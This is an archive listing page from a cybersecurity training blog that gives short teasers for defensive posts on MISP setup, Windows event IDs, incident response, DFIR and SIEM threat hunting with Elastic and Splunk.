Skip to content
-
Security You Can Trust, Expertise You Can Rely On. TekGenX Consulting
NetwerkLABS

Powered By TEKGENX CONSULTING

  • Home
  • BLUE TEAM
    • MITRE ATT&CK
    • INFOSEC Governance and Regulation
      • NIST
        • IDENTIFY
        • PROTECT
        • DETECT
        • RESPOND
        • RECOVER
      • Risk Management
    • SOC
      • Threat Detection and Incident Response
        • Threat Detection EngineeringA practical course on Threat Detection Engineering using Elastic SIEM/EDR
        • Threat Hunting
          • Traffic Analysis
        • Splunk
          • Splunk Basics
          • Understanding Log Sources
          • Dashboards and Reports
          • Exploring SPL
          • Incident Handling with Splunk
          • Investigating with Splunk
    • Security+
    • Scripting
      • Bash Scripting
      • Python
      • ZyBER-TOOLS
  • ZyBER-SERIES
    • Wazuh – SIEM and XDRThe Open Source Security Platform that provides Unified XDR and SIEM protection for endpoints and cloud workloads
    • Attack and Defend Active Directory
    • Offensive Testing Enterprise Networks
    • Threat Detection EngineeringA practical course on Threat Detection Engineering using Elastic SIEM/EDR
    • F5 Local Traffic Manager (LTM)F5 Local Traffic Manager (LTM)
    • Incident Response and Forensics
    • Red Team Engagements
  • ZyBER-INTEL
  • ZyBER-NEWS
  • Cookie Policy (EU)
Subscribe

Intrusion Detection and Response

  • Home
  • BLUE TEAM
  • Intrusion Detection and Response
  • Page 2
Threat Intelligence with MISP: Part 1 – Setting up MISP with Docker
Posted inThreat Hunting Threat Intelligence SOC Analyst

Threat Intelligence with MISP: Part 1 – Setting up MISP with Docker

Step-by-Step Guide to Install MISP Using Docker on Ubuntu In this guide, we will walk through the steps to install the MISP (Malware Information Sharing Platform) using Docker on an…
Read More
Posted by Avatar photo Bharath Narayanasamy
Thraet_Detect_TWO
Posted inThreat Hunting Threat Detection and Incident Response Understanding Log Sources

Useful Windows Event IDs

Windows System Logs Event ID 1074 (System Shutdown/Restart): This event log indicates when and why the system was shut down or restarted. By monitoring these events, you can determine if there…
Read More
Posted by Avatar photo Bharath Narayanasamy
IR_002
Posted inThreat Detection and Incident Response Intrusion Detection and Response

Code Obfuscation and Deobfuscation

Code Obfuscation is a technique used to make a script more difficult to read by humans but allows it to function the same from a technical point of view, though…
Read More
Posted by Avatar photo Bharath Narayanasamy
Incident Response
Posted inVulnLAB Threat Detection and Incident Response Intrusion Detection and Response

Incident Response

Incident response, also known as incident handling, is a cyber security function that uses various methodologies, tools and techniques to detect and manage adversarial attacks while minimizing impact, recovery time…
Read More
Posted by Avatar photo Bharath Narayanasamy
DFIR: Core Windows Processes
Posted inIntrusion Detection and Response RESPOND

DFIR: Core Windows Processes

Reference: TryHackMe Room "Core Windows Processes" Core Windows Processes Understanding how the Windows operating system functions as a defender is vital.  Task Manager doesn't show a Parent-Child process view. That…
Read More
Posted by Avatar photo Bharath Narayanasamy
DFIR: Linux File System Analysis
Posted inThreat Detection and Incident Response Intrusion Detection and Response DETECT

DFIR: Linux File System Analysis

Read More
Posted by Avatar photo Bharath Narayanasamy
Posted inSplunk

Splunk SPL 101

Read More
Posted by Avatar photo Bharath Narayanasamy
Practical Threat Hunting using Elastic SIEM: Hunting for Stuxbot
Posted inElastic SIEM Threat Hunting Threat Detection and Incident Response

Practical Threat Hunting using Elastic SIEM: Hunting for Stuxbot

Based on the INTRODUCTION TO THREAT HUNTING & HUNTING WITH ELASTIC module from HTB-Academy Hunting for Stuxbot The Stuxbot cybercrime group operates with a broad scope, seizing upon opportunities as…
Read More
Posted by Avatar photo Bharath Narayanasamy
Posted inDETECT Elastic SIEM

Elastic SIEM: Developing Dashboards & Visualization

Use case 1: Failed Logon Attempts (Disabled Users) https://youtu.be/7Uyqek-FdwI Use case 2: Failed Logon Attempts (using Admin Accounts) https://youtu.be/UGRmsoqk0EM Use case 3: Successful RDP Logon Related To Service Accounts https://youtu.be/eRjA6TpEryk…
Read More
Posted by Avatar photo Bharath Narayanasamy
Posted inElastic SIEM BLUE TEAM DETECT

SIEM Use cases

How To Build SIEM Use Cases Comprehend your needs, risks, and establish alerts for monitoring all necessary systems accordingly. Determine the priority and impact, then map the alert to the…
Read More
Posted by Avatar photo Bharath Narayanasamy

Posts pagination

Previous page 1 2 3 Next page

Recent Posts

  • The Bait Lab – Phishing Simulations, Practical Campaigns with GoPhish & Evilginx (PART: II)
  • The Bait Lab – Phishing Simulations, Practical Campaigns with GoPhish & Evilginx (PART: I)
  • RED Teaming: Mythic C2 Framework
  • Installing OpenBAS: The OpenSource Breach and Attack Simulation
  • Metasploit Framework (MSFconsole) Cheatsheet

Categories

AD AD attacks brute-force caldera dfir drupal Elastic linux LTM NIST red-team SIEM snort splunk Threat Intel threat_detection Threat_hunting vulnhub wazuh wireshark

Copyright 2025 — NetwerkLABS. Powered by TekGenX Consulting. All rights reserved.
Scroll to Top

Powered by
...
►
Necessary cookies enable essential site features like secure log-ins and consent preference adjustments. They do not store personal data.
None
►
Functional cookies support features like content sharing on social media, collecting feedback, and enabling third-party tools.
None
►
Analytical cookies track visitor interactions, providing insights on metrics like visitor count, bounce rate, and traffic sources.
None
►
Advertisement cookies deliver personalized ads based on your previous visits and analyze the effectiveness of ad campaigns.
None
►
Unclassified cookies are cookies that we are in the process of classifying, together with the providers of individual cookies.
None
Powered by